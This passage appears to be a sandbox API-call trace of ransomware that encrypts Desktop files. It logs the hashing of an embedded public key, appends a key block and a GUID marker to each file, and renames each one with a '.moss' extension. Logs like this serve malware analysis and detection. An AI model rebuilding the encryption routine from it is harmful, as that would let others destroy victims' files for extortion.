KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.108] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.108] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.109] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.109] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.110] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.110] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.110] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] SetLastError (dwErrCode=0x0) [0169.110] GetLastError () returned 0x0 [0169.110] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.110] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.111] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.111] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.111] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xf1b0) returned 0x3b48820 [0169.111] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.111] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45110 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc78 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45158 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcd8 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd08 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.111] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd20 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0169.112] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b579d8 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd08 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd20 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b579d8 | out: hHeap=0xcd0000) returned 1 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbd20 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbd08 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.112] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd20 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbd08 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.112] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.113] GetCurrentThreadId () returned 0x324 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd319d0 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.113] GetCurrentThreadId () returned 0x324 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.113] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.113] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbd08 [0169.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbd20 [0169.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcf0 [0169.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.114] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.114] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.115] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf1a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.115] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.115] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.115] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.115] CloseHandle (hObject=0x664) returned 1 [0169.116] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.116] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.116] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYuqrWvtnb3egSZlbU66.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dyuqrwvtnb3egszlbu66.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dYuqrWvtnb3egSZlbU66.jpg.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dyuqrwvtnb3egszlbu66.jpg.moss")) returned 1 [0169.118] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3787090, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x28785b30, ftLastAccessTime.dwHighDateTime=0x1d5dc48, ftLastWriteTime.dwLowDateTime=0x28785b30, ftLastWriteTime.dwHighDateTime=0x1d5dc48, nFileSizeHigh=0x0, nFileSizeLow=0x2c53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Elsla0Zqhx4FiR_w.pps", cAlternateFileName="ELSLA0~1.PPS")) returned 1 [0169.118] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.118] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.118] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Elsla0Zqhx4FiR_w.pps") returned=".pps" [0169.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Elsla0Zqhx4FiR_w.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\elsla0zqhx4fir_w.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.119] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=11347) returned 1 [0169.119] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.123] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2c2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.123] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.125] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x2c53, lpOverlapped=0x0) returned 1 [0169.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.125] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.125] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.127] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.127] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.127] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.127] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.127] GetLastError () returned 0x0 [0169.127] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.127] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.127] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.127] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.127] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.128] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.128] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.128] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b4b478 [0169.128] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2c53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.128] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.128] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.129] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.129] CloseHandle (hObject=0x664) returned 1 [0169.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.130] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.130] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Elsla0Zqhx4FiR_w.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\elsla0zqhx4fir_w.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Elsla0Zqhx4FiR_w.pps.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\elsla0zqhx4fir_w.pps.moss")) returned 1 [0169.132] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf494bb20, ftCreationTime.dwHighDateTime=0x1d5dc50, ftLastAccessTime.dwLowDateTime=0x2e8537d0, ftLastAccessTime.dwHighDateTime=0x1d5e465, ftLastWriteTime.dwLowDateTime=0x2e8537d0, ftLastWriteTime.dwHighDateTime=0x1d5e465, nFileSizeHigh=0x0, nFileSizeLow=0x26b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EQ9uGJ_2p6GN4_4.bmp", cAlternateFileName="EQ9UGJ~1.BMP")) returned 1 [0169.132] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.133] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.133] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EQ9uGJ_2p6GN4_4.bmp") returned=".bmp" [0169.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\EQ9uGJ_2p6GN4_4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eq9ugj_2p6gn4_4.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.133] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=9911) returned 1 [0169.133] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.137] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2691, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.137] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.139] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.139] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x26b7, lpOverlapped=0x0) 